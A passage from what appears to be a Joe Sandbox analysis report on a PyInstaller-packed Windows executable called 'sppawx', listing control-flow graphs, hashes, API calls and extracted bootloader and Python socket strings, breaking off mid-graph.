                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                              • Opcode ID: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                                                                                                                                              • Instruction ID: 03c4d08e3115ac42c21fa2e0a380b22c70f6257345d3ce32a4b19bf3b1daf547
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA816E71A0EA8696FB70EB34D0452F9B3A0AF88784FC4447DE98D47785DE3CE5868760

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 937 7ffedd275ab8-7ffedd275b09 call 7ffedd2793d0 940 7ffedd275b0b-7ffedd275b15 937->940 941 7ffedd275b17-7ffedd275b3c call 7ffedd279340 937->941 940->941 942 7ffedd275b57-7ffedd275b65 940->942 947 7ffedd275b92 941->947 948 7ffedd275b3e-7ffedd275b41 941->948 944 7ffedd275d2a-7ffedd275d3a call 7ffedd279510 942->944 945 7ffedd275b6b-7ffedd275b73 942->945 961 7ffedd275d3c-7ffedd275d45 call 7ffedd279560 944->961 962 7ffedd275d67-7ffedd275d96 call 7ffedd27372c getsockname 944->962 949 7ffedd275b75-7ffedd275b8c call 7ffedd2794a0 945->949 950 7ffedd275bbb-7ffedd275bc4 945->950 955 7ffedd275b97-7ffedd275bba call 7ffedd272a50 947->955 952 7ffedd275e02-7ffedd275e58 call 7ffedd279548 WSASocketW call 7ffedd279468 948->952 953 7ffedd275b47-7ffedd275b51 948->953 949->947 956 7ffedd275bcc-7ffedd275c1d 950->956 973 7ffedd275e5e-7ffedd275e65 952->973 953->942 953->952 956->956 960 7ffedd275c1f-7ffedd275c92 call 7ffedd279340 956->960 960->947 976 7ffedd275c98-7ffedd275cda call 7ffedd279548 WSASocketW call 7ffedd279468 960->976 961->947 972 7ffedd275d4b-7ffedd275d62 call 7ffedd2794d8 961->972 974 7ffedd275da4-7ffedd275da7 962->974 975 7ffedd275d98-7ffedd275d9b 962->975 972->947 979 7ffedd275cdc-7ffedd275ce1 call 7ffedd274a40 973->979 980 7ffedd275e6b-7ffedd275e89 call 7ffedd2743d0 973->980 974->979 983 7ffedd275dad-7ffedd275db8 WSAGetLastError 974->983 981 7ffedd275dbe-7ffedd275dc2 975->981 982 7ffedd275d9d-7ffedd275da2 975->982 976->979 997 7ffedd275ce6-7ffedd275cf6 SetHandleInformation 976->997 979->947 995 7ffedd275d00-7ffedd275d09 closesocket 980->995 996 7ffedd275e8f-7ffedd275e91 980->996 988 7ffedd275dc4-7ffedd275df2 getsockopt 981->988 989 7ffedd275dfd-7ffedd275e00 981->989 982->981 983->979 983->981 988->979 993 7ffedd275df8 988->993 989->980 993->989 995->947 996->955 998 7ffedd275d0e-7ffedd275d25 997->998 999 7ffedd275cf8-7ffedd275cfa call 7ffedd279530 997->999 998->980 999->995
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Socket$ErrorHandleInformationLastclosesocketgetsocknamegetsockopt
                                                                                                                                                                                                                              • String ID: Oiii$negative file descriptor$socket descriptor string has wrong size, should be %zu bytes.$socket.__new__
                                                                                                                                                                                                                              • API String ID: 141981615-2881308447
                                                                                                                                                                                                                              • Opcode ID: 51c0c51d7ade0c141ff158bc388cd8ab4400a00c2f97c7c74dffe455cbaabff0
                                                                                                                                                                                                                              • Instruction ID: 24e21a2c5932c01efbe24a6b62c48f7d689456d0cbd8622f26c7bfdc58ae90a1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51c0c51d7ade0c141ff158bc388cd8ab4400a00c2f97c7c74dffe455cbaabff0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82B14162E08B8592E6308B2998042BD6360FBD9BB4F185336DE5D53AB5FF3CE5858700

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1001 7ffedd2770e0-7ffedd277184 call 7ffedd2794a8 1004 7ffedd2774a2 1001->1004 1005 7ffedd27718a-7ffedd277195 1001->1005 1008 7ffedd2774a4-7ffedd2774c4 1004->1008 1006 7ffedd27719c-7ffedd2771aa 1005->1006 1007 7ffedd277197-7ffedd27719a 1005->1007 1010 7ffedd2771ce-7ffedd2771d2 1006->1010 1011 7ffedd2771ac-7ffedd2771c2 call 7ffedd2795b0 1006->1011 1009 7ffedd2771e5-7ffedd2771f4 1007->1009 1014 7ffedd277210-7ffedd27721a 1009->1014 1015 7ffedd2771f6-7ffedd277205 call 7ffedd2793f8 1009->1015 1012 7ffedd27748b-7ffedd27749c call 7ffedd2794d8 1010->1012 1013 7ffedd2771d8-7ffedd2771de call 7ffedd279568 1010->1013 1011->1004 1023 7ffedd2771c8-7ffedd2771cc 1011->1023 1012->1004 1029 7ffedd2771e1 1013->1029 1020 7ffedd27721c 1014->1020 1021 7ffedd27723b-7ffedd27723f 1014->1021 1033 7ffedd27720b-7ffedd27720e 1015->1033 1034 7ffedd277448-7ffedd27744b 1015->1034 1028 7ffedd27721f-7ffedd27722b call 7ffedd279328 1020->1028 1024 7ffedd277241-7ffedd277245 1021->1024 1025 7ffedd277247-7ffedd27724e 1021->1025 1023->1029 1030 7ffedd277257-7ffedd277285 call 7ffedd279340 1024->1030 1031 7ffedd277254 1025->1031 1032 7ffedd277431-7ffedd277442 call 7ffedd2794d8 1025->1032 1028->1034 1042 7ffedd277231-7ffedd277239 1028->1042 1029->1009 1030->1004 1048 7ffedd27728b-7ffedd2772d6 call 7ffedd279548 getaddrinfo call 7ffedd279468 1030->1048 1031->1030 1032->1034 1033->1028 1038 7ffedd277461-7ffedd277464 1034->1038 1039 7ffedd27744d-7ffedd277450 1034->1039 1043 7ffedd27747a-7ffedd277481 1038->1043 1044 7ffedd277466-7ffedd277469 1038->1044 1039->1038 1041 7ffedd277452-7ffedd277456 1039->1041 1041->1038 1046 7ffedd277458-7ffedd27745b call 7ffedd2792e8 1041->1046 1042->1030 1043->1004 1049 7ffedd277483-7ffedd277489 FreeAddrInfoW 1043->1049 1044->1043 1047 7ffedd27746b-7ffedd27746f 1044->1047 1046->1038 1047->1043 1051 7ffedd277471-7ffedd277474 call 7ffedd2792e8 1047->1051 1056 7ffedd2772dc-7ffedd2772df 1048->1056 1049->1004 1051->1043 1057 7ffedd2772e1-7ffedd2772f1 call 7ffedd274a74 1056->1057 1058 7ffedd2772f6-7ffedd277304 call 7ffedd279348 1056->1058 1057->1034 1058->1034 1063 7ffedd27730a-7ffedd277311 1058->1063 1064 7ffedd2773be-7ffedd2773c1 1063->1064 1065 7ffedd277317-7ffedd27732e call 7ffedd27481c 1063->1065 1067 7ffedd2773c3-7ffedd2773c6 1064->1067 1068 7ffedd2773d7-7ffedd2773da 1064->1068 1075 7ffedd277334-7ffedd277371 call 7ffedd279580 1065->1075 1076 7ffedd27741a-7ffedd27741e 1065->1076 1067->1068 1070 7ffedd2773c8-7ffedd2773cc 1067->1070 1071 7ffedd2773f0-7ffedd2773f7 1068->1071 1072 7ffedd2773dc-7ffedd2773df 1068->1072 1070->1068 1077 7ffedd2773ce-7ffedd2773d1 call 7ffedd2792e8 1070->1077 1073 7ffedd2773ff-7ffedd277402 1071->1073 1074 7ffedd2773f9 FreeAddrInfoW 1071->1074 1072->1071 1078 7ffedd2773e1-7ffedd2773e5 1072->1078 1073->1008 1074->1073 1086 7ffedd277383-7ffedd277386 1075->1086 1087 7ffedd277373-7ffedd277378 1075->1087 1076->1034 1080 7ffedd277420-7ffedd277424 1076->1080 1077->1068 1078->1071 1082 7ffedd2773e7-7ffedd2773ea call 7ffedd2792e8 1078->1082 1080->1034 1084 7ffedd277426-7ffedd27742f call 7ffedd2792e8 1080->1084 1082->1071 1084->1034 1086->1076 1091 7ffedd27738c-7ffedd27739c call 7ffedd279368 1086->1091 1087->1086 1089 7ffedd27737a-7ffedd27737d call 7ffedd2792e8 1087->1089 1089->1086 1095 7ffedd27739e-7ffedd2773a0 1091->1095 1096 7ffedd277407-7ffedd277409 1091->1096 1097 7ffedd2773a2-7ffedd2773a6 1095->1097 1098 7ffedd2773b1-7ffedd2773b8 1095->1098 1096->1076 1099 7ffedd27740b-7ffedd27740f 1096->1099 1097->1098 1100 7ffedd2773a8-7ffedd2773ab call 7ffedd2792e8 1097->1100 1098->1064 1098->1065 1099->1076 1101 7ffedd277411-7ffedd277414 call 7ffedd2792e8 1099->1101 1100->1098 1101->1076
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddrFreeInfo$getaddrinfo
                                                                                                                                                                                                                              • String ID: Int or String expected$OOiii$OO|iiii:getaddrinfo$getaddrinfo() argument 1 must be string or None$idna$iiisO$socket.getaddrinfo
                                                                                                                                                                                                                              • API String ID: 2288433384-1074899869
                                                                                                                                                                                                                              • Opcode ID: 7441c1bdc6c0a51231ad90fd4d61be9deae8f579bfc0bdc344df3fee02db1e18
                                                                                                                                                                                                                              • Instruction ID: 85ec446f3f1f837c681394ba1afd628604104d01ca0421c3d89b69e3d48f8a9b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7441c1bdc6c0a51231ad90fd4d61be9deae8f579bfc0bdc344df3fee02db1e18
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4C11432B09A42A6EB349F61D4646BC37B4BB88BA4F084536DE4E53E64EF7CE545C700

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 8300a19c8206d2102841afb71172eaa2682942542eff747ed74e125f239e34bf
                                                                                                                                                                                                                              • Instruction ID: b0e3666f0701b6b8ee9c2ca97a87f222c2f8db18dccc6f9d51e3304b4f6776b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8300a19c8206d2102841afb71172eaa2682942542eff747ed74e125f239e34bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77415E22B0A64296FA20EF3194415F9F390EF44798FC445BEED4D07B99DE3CE5468724

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1563 7ff79a311210-7ff79a31126d call 7ff79a31bdf0 1566 7ff79a311297-7ff79a3112af call 7ff79a324fb4 1563->1566 1567 7ff79a31126f-7ff79a311296 call 7ff79a312710 1563->1567 1572 7ff79a3112b1-7ff79a3112cf call 7ff79a324f78 call 7ff79a312910 1566->1572 1573 7ff79a3112d4-7ff79a3112e4 call 7ff79a324fb4 1566->1573 1586 7ff79a311439-7ff79a31146d call 7ff79a31bad0 call 7ff79a324fa0 * 2 1572->1586 1579 7ff79a311309-7ff79a31131b 1573->1579 1580 7ff79a3112e6-7ff79a311304 call 7ff79a324f78 call 7ff79a312910 1573->1580 1581 7ff79a311320-7ff79a311345 call 7ff79a32040c 1579->1581 1580->1586 1592 7ff79a31134b-7ff79a311355 call 7ff79a320180 1581->1592 1593 7ff79a311431 1581->1593 1592->1593 1599 7ff79a31135b-7ff79a311367 1592->1599 1593->1586 1601 7ff79a311370-7ff79a311398 call 7ff79a31a230 1599->1601 1604 7ff79a31139a-7ff79a31139d 1601->1604 1605 7ff79a311416-7ff79a31142c call 7ff79a312710 1601->1605 1607 7ff79a31139f-7ff79a3113a9 1604->1607 1608 7ff79a311411 1604->1608 1605->1593 1609 7ff79a3113ab-7ff79a3113b9 call 7ff79a320b4c 1607->1609 1610 7ff79a3113d4-7ff79a3113d7 1607->1610 1608->1605 1614 7ff79a3113be-7ff79a3113c1 1609->1614 1612 7ff79a3113d9-7ff79a3113e7 call 7ff79a339ea0 1610->1612 1613 7ff79a3113ea-7ff79a3113ef 1610->1613 1612->1613 1613->1601 1616 7ff79a3113f5-7ff79a3113f8 1613->1616 1617 7ff79a3113cf-7ff79a3113d2 1614->1617 1618 7ff79a3113c3-7ff79a3113cd call 7ff79a320180 1614->1618 1620 7ff79a3113fa-7ff79a3113fd 1616->1620 1621 7ff79a31140c-7ff79a31140f 1616->1621 1617->1605 1618->1613 1618->1617 1620->1605 1623 7ff79a3113ff-7ff79a311407 1620->1623 1621->1593 1623->1581
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                              • Opcode ID: 0fca6e7335867edc6b8860f5dfbc0b69d345714f0ea111fe4b1d6fcc205b14f0
                                                                                                                                                                                                                              • Instruction ID: 9cdb12622e3148e02a00d8b745e59fab0dcd56885ffe48e76a50b76ddae2c995
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fca6e7335867edc6b8860f5dfbc0b69d345714f0ea111fe4b1d6fcc205b14f0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF519F22A0A64285FA70FB32A4503BAF291EF85B94FC4457DED4D477D9EE3CE5058720

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1625 7ffedd27514c-7ffedd275180 1626 7ffedd275183-7ffedd275186 1625->1626 1627 7ffedd275198-7ffedd27519b 1626->1627 1628 7ffedd275188-7ffedd275190 1626->1628 1631 7ffedd2751bf-7ffedd2751ce call 7ffedd279440 1627->1631 1632 7ffedd27519d-7ffedd2751a9 call 7ffedd2793d8 1627->1632 1629 7ffedd275196 1628->1629 1630 7ffedd275237-7ffedd275245 call 7ffedd279548 1628->1630 1633 7ffedd2751d1 1629->1633 1678 7ffedd275248 call 7ffedd276854 1630->1678 1679 7ffedd275248 call 7ffedd276268 1630->1679 1631->1633 1637 7ffedd2751d4-7ffedd2751ec call 7ffedd274550 1632->1637 1642 7ffedd2751ab-7ffedd2751ae 1632->1642 1633->1637 1648 7ffedd27522e-7ffedd275231 1637->1648 1649 7ffedd2751ee-7ffedd2751f1 1637->1649 1645 7ffedd2751b4-7ffedd2751ba 1642->1645 1646 7ffedd2752c8-7ffedd2752d9 call 7ffedd2794d8 1642->1646 1643 7ffedd27524c-7ffedd275259 call 7ffedd279468 1656 7ffedd27525b-7ffedd27525e 1643->1656 1657 7ffedd2752b9-7ffedd2752bc 1643->1657 1651 7ffedd2752df 1645->1651 1646->1651 1648->1630 1648->1642 1653 7ffedd2751f3-7ffedd2751f9 WSAGetLastError 1649->1653 1654 7ffedd2751fb-7ffedd275206 WSAGetLastError 1649->1654 1655 7ffedd2752e4-7ffedd2752f2 1651->1655 1653->1654 1658 7ffedd2752b4-7ffedd2752b7 1654->1658 1659 7ffedd27520c-7ffedd275214 call 7ffedd2793b0 1654->1659 1662 7ffedd275260-7ffedd275266 WSAGetLastError 1656->1662 1663 7ffedd275268-7ffedd275273 WSAGetLastError 1656->1663 1660 7ffedd2752c4-7ffedd2752c6 1657->1660 1661 7ffedd2752be 1657->1661 1658->1651 1659->1626 1670 7ffedd27521a-7ffedd27521d 1659->1670 1660->1655 1661->1660 1662->1663 1666 7ffedd275275-7ffedd27527d call 7ffedd2793b0 1663->1666 1667 7ffedd275281-7ffedd275286 1663->1667 1666->1630 1676 7ffedd27527f 1666->1676 1671 7ffedd2752af-7ffedd2752b2 1667->1671 1672 7ffedd275288-7ffedd275297 WSAGetLastError 1667->1672 1670->1651 1674 7ffedd275223-7ffedd275229 1670->1674 1671->1651 1671->1658 1672->1626 1675 7ffedd27529d-7ffedd2752a8 WSAGetLastError 1672->1675 1674->1651 1675->1671 1677 7ffedd2752aa 1675->1677 1676->1670 1677->1626 1678->1643 1679->1643
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$select
                                                                                                                                                                                                                              • String ID: timed out
                                                                                                                                                                                                                              • API String ID: 1043644060-3163636755
                                                                                                                                                                                                                              • Opcode ID: 6124cbb36627d7d402abdbcc8bc250e63c8ca632a2510f4f5e29746a45a24143
                                                                                                                                                                                                                              • Instruction ID: 5d91ca7ac4ec2e307d4ea3d65b6ff1a77d0d9620c08048fb04ba8dfce361d1d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6124cbb36627d7d402abdbcc8bc250e63c8ca632a2510f4f5e29746a45a24143
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED416D31E09742A6FA756B65A84427DA290AFD5BB5F1C4133DD4E46EB4FF3CA8878200

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF79A313804), ref: 00007FF79A3136E1
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A313804), ref: 00007FF79A3136EB
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312C9E
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312D63
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312C50: MessageBoxW.USER32 ref: 00007FF79A312D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                              • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction ID: 5a229fdd7c3bb9797aaf822313a529a280b8426934195dd4ae7486ff112769f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19214F61F1E64291FA71FB31E8553B6B290BF88394FC041BEE65D825D5EE2CE509C720

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1920 7ff79a32bacc-7ff79a32baf2 1921 7ff79a32bb0d-7ff79a32bb11 1920->1921 1922 7ff79a32baf4-7ff79a32bb08 call 7ff79a324f58 call 7ff79a324f78 1920->1922 1924 7ff79a32bee7-7ff79a32bef3 call 7ff79a324f58 call 7ff79a324f78 1921->1924 1925 7ff79a32bb17-7ff79a32bb1e 1921->1925 1940 7ff79a32befe 1922->1940 1943 7ff79a32bef9 call 7ff79a32a950 1924->1943 1925->1924 1926 7ff79a32bb24-7ff79a32bb52 1925->1926 1926->1924 1929 7ff79a32bb58-7ff79a32bb5f 1926->1929 1932 7ff79a32bb78-7ff79a32bb7b 1929->1932 1933 7ff79a32bb61-7ff79a32bb73 call 7ff79a324f58 call 7ff79a324f78 1929->1933 1938 7ff79a32bb81-7ff79a32bb87 1932->1938 1939 7ff79a32bee3-7ff79a32bee5 1932->1939 1933->1943 1938->1939 1944 7ff79a32bb8d-7ff79a32bb90 1938->1944 1941 7ff79a32bf01-7ff79a32bf18 1939->1941 1940->1941 1943->1940 1944->1933 1947 7ff79a32bb92-7ff79a32bbb7 1944->1947 1949 7ff79a32bbb9-7ff79a32bbbb 1947->1949 1950 7ff79a32bbea-7ff79a32bbf1 1947->1950 1953 7ff79a32bbbd-7ff79a32bbc4 1949->1953 1954 7ff79a32bbe2-7ff79a32bbe8 1949->1954 1951 7ff79a32bbc6-7ff79a32bbdd call 7ff79a324f58 call 7ff79a324f78 call 7ff79a32a950 1950->1951 1952 7ff79a32bbf3-7ff79a32bc1b call 7ff79a32d66c call 7ff79a32a9b8 * 2 1950->1952 1983 7ff79a32bd70 1951->1983 1985 7ff79a32bc38-7ff79a32bc63 call 7ff79a32c2f4 1952->1985 1986 7ff79a32bc1d-7ff79a32bc33 call 7ff79a324f78 call 7ff79a324f58 1952->1986 1953->1951 1953->1954 1955 7ff79a32bc68-7ff79a32bc7f 1954->1955 1958 7ff79a32bcfa-7ff79a32bd04 call 7ff79a33398c 1955->1958 1959 7ff79a32bc81-7ff79a32bc89 1955->1959 1970 7ff79a32bd0a-7ff79a32bd1f 1958->1970 1971 7ff79a32bd8e 1958->1971 1959->1958 1964 7ff79a32bc8b-7ff79a32bc8d 1959->1964 1964->1958 1968 7ff79a32bc8f-7ff79a32bca5 1964->1968 1968->1958 1973 7ff79a32bca7-7ff79a32bcb3 1968->1973 1970->1971 1975 7ff79a32bd21-7ff79a32bd33 GetConsoleMode 1970->1975 1979 7ff79a32bd93-7ff79a32bdb3 ReadFile 1971->1979 1973->1958 1977 7ff79a32bcb5-7ff79a32bcb7 1973->1977 1975->1971 1982 7ff79a32bd35-7ff79a32bd3d 1975->1982 1977->1958 1984 7ff79a32bcb9-7ff79a32bcd1 1977->1984 1980 7ff79a32bdb9-7ff79a32bdc1 1979->1980 1981 